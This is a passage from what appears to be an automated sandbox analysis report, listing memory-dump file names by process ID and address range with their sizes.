memory/1752-228-0x0000000006A63000-0x0000000006A64000-memory.dmpFilesize
4KB
-
memory/1908-145-0x0000000000000000-mapping.dmp
-
memory/1908-240-0x0000000006E83000-0x0000000006E84000-memory.dmpFilesize
4KB
-
memory/1908-180-0x0000000006E82000-0x0000000006E83000-memory.dmpFilesize
4KB
-
memory/1908-177-0x0000000006E80000-0x0000000006E81000-memory.dmpFilesize
4KB
-
memory/2204-116-0x0000000000000000-mapping.dmp
-
memory/2204-120-0x00000000035F1000-0x00000000035F5000-memory.dmpFilesize
16KB
-
memory/2204-121-0x0000000000850000-0x0000000000851000-memory.dmpFilesize
4KB
-
memory/2632-163-0x0000000006E50000-0x0000000006E51000-memory.dmpFilesize
4KB
-
memory/2632-207-0x0000000007D20000-0x0000000007D21000-memory.dmpFilesize
4KB
-
memory/2632-134-0x0000000000000000-mapping.dmp
-
memory/2632-226-0x0000000006E53000-0x0000000006E54000-memory.dmpFilesize
4KB
-
memory/2632-212-0x0000000007DC0000-0x0000000007DC1000-memory.dmpFilesize
4KB
-
memory/2632-209-0x0000000006E52000-0x0000000006E53000-memory.dmpFilesize
4KB
-
memory/2632-205-0x0000000007C40000-0x0000000007C41000-memory.dmpFilesize
4KB
-
memory/2632-194-0x0000000007BA0000-0x0000000007BA1000-memory.dmpFilesize
4KB
-
memory/2692-175-0x00000000049F2000-0x00000000049F3000-memory.dmpFilesize
4KB
-
memory/2692-138-0x0000000000000000-mapping.dmp
-
memory/2692-170-0x00000000049F0000-0x00000000049F1000-memory.dmpFilesize
4KB
-
memory/2692-247-0x00000000049F3000-0x00000000049F4000-memory.dmpFilesize
4KB
-
memory/2916-122-0x0000000000000000-mapping.dmp
-
memory/3148-280-0x0000000000000000-mapping.dmp
-
memory/3628-218-0x0000000004CA2000-0x0000000004CA3000-memory.dmpFilesize
4KB
-
memory/3628-230-0x0000000004CA3000-0x0000000004CA4000-memory.dmpFilesize
4KB
-
memory/3628-188-0x0000000004CA0000-0x0000000004CA1000-memory.dmpFilesize
4KB
-
memory/3628-137-0x0000000000000000-mapping.dmp
-
memory/3680-114-0x0000000000400000-0x0000000000501000-memory.dmpFilesize
1.0MB
-
memory/3936-135-0x0000000000000000-mapping.dmp
-
memory/3936-156-0x0000000007340000-0x0000000007341000-memory.dmpFilesize
4KB
-
memory/3936-227-0x0000000006D03000-0x0000000006D04000-memory.dmpFilesize
4KB
-
memory/3936-183-0x0000000006D02000-0x0000000006D03000-memory.dmpFilesize
4KB
-
memory/3936-167-0x0000000006D00000-0x0000000006D01000-memory.dmpFilesize
4KB
-
memory/3956-128-0x0000000000000000-mapping.dmp
-
memory/4084-136-0x0000000000000000-mapping.dmp
-
memory/4084-229-0x0000000006813000-0x0000000006814000-memory.dmpFilesize
4KB
-
memory/4084-172-0x0000000006810000-0x0000000006811000-memory.dmpFilesize
4KB
-
memory/4084-215-0x0000000006812000-0x0000000006813000-memory.dmpFilesize
4KB
-
memory/4156-149-0x0000000000000000-mapping.dmp
-
memory/4156-187-0x0000000007250000-0x0000000007251000-memory.dmpFilesize
4KB
-
memory/4156-254-0x0000000007253000-0x0000000007254000-memory.dmpFilesize
4KB
-
memory/4156-193-0x0000000007252000-0x0000000007253000-memory.dmpFilesize
4KB
-
memory/4168-276-0x0000000000000000-mapping.dmp
-
memory/4184-273-0x0000000000000000-mapping.dmp
-
memory/4224-155-0x0000000000000000-mapping.dmp
-
memory/4224-201-0x00000000073E2000-0x00000000073E3000-memory.dmpFilesize
4KB
-
memory/4224-248-0x00000000073E3000-0x00000000073E4000-memory.dmpFilesize
4KB
-
memory/4224-192-0x00000000073E0000-0x00000000073E1000-memory.dmpFilesize
4KB
-
memory/4284-199-0x0000000007392000-0x0000000007393000-memory.dmpFilesize
4KB
-
memory/4284-203-0x0000000007390000-0x0000000007391000-memory.dmpFilesize
4KB
-
memory/4284-252-0x0000000007393000-0x0000000007394000-memory.dmpFilesize
4KB
-
memory/4284-161-0x0000000000000000-mapping.dmp
-
memory/4988-304-0x0000000000000000-mapping.dmp
-
memory/5100-294-0x0000000000000000-mapping.dmp
-
memory/5312-295-0x0000000000000000-mapping.dmp
-
memory/5988-300-0x0000000000000000-mapping.dmp
-
memory/6180-298-0x0000000000000000-mapping.dmp
-
memory/7144-301-0x0000000000000000-mapping.dmp
-
memory/7664-302-0x0000000000000000-mapping.dmp
-
memory/8308-303-0x0000000000000000-mapping.dmp
-
memory/8864-305-0x0000000000000000-mapping.dmp
-
memory/11720-255-0x0000000000000000-mapping.dmp
-
memory/14300-296-0x0000000000000000-mapping.dmp
-
memory/14488-306-0x0000000000000000-mapping.dmp
-
memory/14932-297-0x0000000000000000-mapping.dmp
-
memory/15248-260-0x0000000000000000-mapping.dmp
-
memory/15340-263-0x0000000000000000-mapping.dmp